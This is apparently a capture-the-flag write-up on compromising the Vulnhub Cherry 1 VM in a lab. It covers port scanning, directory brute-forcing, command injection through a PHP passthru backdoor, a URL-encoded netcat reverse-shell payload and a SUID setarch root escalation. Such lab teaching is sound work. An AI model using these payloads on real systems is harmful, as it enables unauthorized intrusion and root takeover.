In this article we will go through Cherry 1 VM from Vulnhub, an easy virtual machine to help you out with security tools and improve your skills. You can download the OVA file here.

Our lab is set with a Kali Linux machine and the Cherry 1, both on a NAT network with CIDR 10.10.10.0/24.
Kali Linux has IP 10.10.10.4
Cherry 1 has IP 10.10.10.8 (Ubuntu 20.04.1)

As we were using VirtualBox we encountered a networking problem because the Cherry 1 was built for VMware Workstation Player. This machine use a network interface name which were not the one VirtualBox provided to Cherry 1. These steps need to be followed only to resolve this problem.

The issue was on the network interface name and we were not able to release an IP address to Cherry box. We booted our VM with a live cd and changed the netplan configuration file.

Boot with a live cd, we used Ubuntu Desktop.
Get the NIC’s name with ifconfig (or ip command).
Mount the VM’s disk.
mount /dev/dm-0 /mnt/cherry
Chroot into /mnt/cherry.
chroot /mnt/cherry
Go to /etc/netplan and edit the yaml: rename the interface name with yours.
Unmount /mnt/cherry with umount.
Restart.

Port Scanning

We started scanning our Cherry VM with nmap with this command:

nmap -p- -sV -sC 10.10.10.8 -oN first_scan.txt

The output will be stored in first_scan.txt in the current directory and also in our terminal. These results may be helpful going forward with the analysis.

This is the output:

# Nmap 7.80 scan initiated Sat Jan 30 12:20:34 2021 as: nmap -p- -sV -sC -oN first_scan.txt 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up (0.00012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Cherry
7755/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Cherry
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.80%I=7%D=1/30%Time=6015956B%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:7B:63:EF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 30 12:20:58 2021 -- 1 IP address (1 host up) scanned in 24.17 seconds

As reported by nmap we have ports 22, 80, 7755, 33060 open. We will start trying with web servers on 80 and 7755.
Going to http://10.10.10.8/ and http://10.10.10.8:7755/ our browser will show us this:

Bruteforcing web directories

In order to discover what files or directories are available through these port we will use dirbuster. Make sure you have some wordlists in your attacking machine, usually Kali Linux comes with a bunch of these lists. If you are not sure of which wordlists you have you may run:

locate wordlist

We will use: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

dirbuster -u http://10.10.10.8:7755 -l /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 -e html,htm,php,txt -v

Run dirbuster.

-u specify the url of the target
-l path for wordlist
-t number of threads
-e files extension
-v verbose mode

This will run for 10/20 minutes, depending on how much cpu/ram you gave to Kali.

Get Mattia Zignale’s stories in your inbox

Join Medium for free to get updates from this writer.

These are our results:

/
/icons/
/backup/
/icons/small/
/server-status/
/index.html
/info.php
/backup/command.php
/backup/latest.tar.gz
/backup/master.zip.bak
/backup/master.zip
/backup/command.php

We will focus on command.php.

If we try to connect to the same file on the 80 port, the file will be downloaded on your Kali machine. This code shows it’s using passthru php command which is like exec, so we can execute commands through this.

command.php’s content:

<?php echo passthru($_GET['backup']); ?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Backup</title>
</head>
<body>
<!-- </?php echo passthru($_GET['backup']); ?/> -->
</body>
</html>

Exploiting payload

As this query will execute commands we will try with the id command as follow:

http://10.10.10.8:7755/backup/command.php?backup=id

You can try also with cat /etc/passwd. To make sure encode commands with special character (space, slash) with url encoding.

Prepare Kali box with netcat on a high port with -lvnp options, we are going to build a reverse shell backdoor.

nc -lvnp 4444

The payload we used is:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.4 4444 >/tmp/f

The final url with payload is now: http://10.10.10.8:7755/ backup/command.php? backup=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20- i%202%3E%261%7Cnc%2010.10.10.4%204444%20%3E%2Ftmp%2Ff

On our Kali machine we will see that a shell (non-interactive) is prompted, to change it into an interactive shell we wrote the following python command:

python3 -c 'import pty;pty.spawn("/bin/bash")'

This will spawn an interactive shell in our terminal.

Privilege escalation

Now we have access to Cherry 1 with www-data user, but we want the root user.

We were looking for an exploitable SUID, we found setarch. This command and this site will help:

find / -perm -u=s -type f 2>/dev/null

As we find out that the setarch command could gave us root privilege we are going to exploit that with:

setarch $(arch) /bin/sh -p

Now we are root.

Use id command or whoami if you don’t trust us ;-)

Move to /root directory and read proof.txt.

Here is the flag:

Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b

Conclusion

This virtual machine shows how important are correct settings in a Web Servers, as we exploited the source code of the downloaded php file. Such a testing like this could be a powerful instrument to have a better understanding of how things work in our network and gives us the right prospective to implement new systems with the appropriate security posture.